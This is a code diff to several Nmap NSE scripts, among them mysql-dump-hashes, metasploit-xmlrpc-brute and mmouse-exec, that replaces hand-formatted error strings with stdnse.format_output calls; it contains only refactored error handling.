--- a/scripts/memcached-info.nse
+++ b/scripts/memcached-info.nse
@@ -60,7 +60,7 @@ local order = {
  "auth_enabled_sasl"
 }
-local function fail(err) return ("\n  ERROR: %s"):format(err) end
+local function fail(err) return stdnse.format_output(false, err) end
 local function mergetab(tab1, tab2)
  for k, v in pairs(tab2) do
--- a/scripts/metasploit-xmlrpc-brute.nse
+++ b/scripts/metasploit-xmlrpc-brute.nse
@@ -87,7 +87,7 @@ action = function(host, port)
  local xmlreq='<?xml version="1.0" ?><methodCall><methodName>core.version</methodName></methodCall>\n\0'
  local socket, _, opts = comm.tryssl(host, port, xmlreq, { recv_first = false } )
  if ( not(socket) ) then
-    return "\n  ERROR: Failed to determine whether SSL was needed or not"
+    return stdnse.format_output(false, "Failed to determine whether SSL was needed or not")
  end
  local engine = brute.Engine:new(Driver, host, port, opts)
--- a/scripts/mmouse-exec.nse
+++ b/scripts/mmouse-exec.nse
@@ -133,7 +133,7 @@ local function executeCmd(socket, app, keys)
  return true
 end
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
--- a/scripts/mrinfo.nse
+++ b/scripts/mrinfo.nse
@@ -251,7 +251,7 @@ action = function()
    interface = getInterface(target)
  end
  if not interface then
-    return ("\n ERROR: Couldn't get interface for %s"):format(target)
+    return stdnse.format_output(false, ("Couldn't get interface for %s"):format(target))
  end
  stdnse.debug1("will send to %s via %s interface.", target, interface.shortname)
--- a/scripts/mtrace.nse
+++ b/scripts/mtrace.nse
@@ -344,7 +344,7 @@ action = function()
    interface = getInterface(firsthop)
  end
  if not interface then
-    return ("\n ERROR: Couldn't get interface for %s"):format(firsthop)
+    return stdnse.format_output(false, ("Couldn't get interface for %s"):format(firsthop))
  end
  -- Destination defaults to our own host
--- a/scripts/mysql-audit.nse
+++ b/scripts/mysql-audit.nse
@@ -93,6 +93,8 @@ categories = {"discovery", "safe"}
 portrule = shortport.port_or_service(3306, "mysql")
 local TEMPLATE_NAME, ADMIN_ACCOUNTS = "", ""
 local function fail (err) return stdnse.format_output(false, err) end
 local function loadAuditRulebase( filename )
  local rules = {}
@@ -103,7 +105,7 @@ local function loadAuditRulebase( filename )
  local file, err = loadfile(filename, "t", env)
  if ( not(file) ) then
-    return false, ("ERROR: Failed to load rulebase:\n%s"):format(err)
+    return false, fail(("Failed to load rulebase:\n%s"):format(err))
  end
@@ -120,11 +122,11 @@ action = function( host, port )
  local filename = stdnse.get_script_args("mysql-audit.filename")
  if ( not(filename) ) then
-    return "\n  No audit rulebase file was supplied (see mysql-audit.filename)"
+    return fail("No audit rulebase file was supplied (see mysql-audit.filename)")
  end
  if ( not(username) ) then
-    return "\n  No username was supplied (see mysql-audit.username)"
+    return fail("No username was supplied (see mysql-audit.username)")
  end
  local status, tests = loadAuditRulebase( filename )
@@ -139,7 +141,7 @@ action = function( host, port )
  status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
-  if ( not(status) ) then return "ERROR: Failed to authenticate" end
+  if ( not(status) ) then return fail("Failed to authenticate") end
  local results = {}
  for _, test in ipairs(tests) do
--- a/scripts/mysql-dump-hashes.nse
+++ b/scripts/mysql-dump-hashes.nse
@@ -40,7 +40,7 @@ portrule = shortport.port_or_service(3306, "mysql")
 local arg_username = stdnse.get_script_args(SCRIPT_NAME .. ".username")
 local arg_password = stdnse.get_script_args(SCRIPT_NAME .. ".password") or ""
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 local function getCredentials()
  -- first, let's see if the script has any credentials as arguments?
--- a/Show More
+++ b/Show More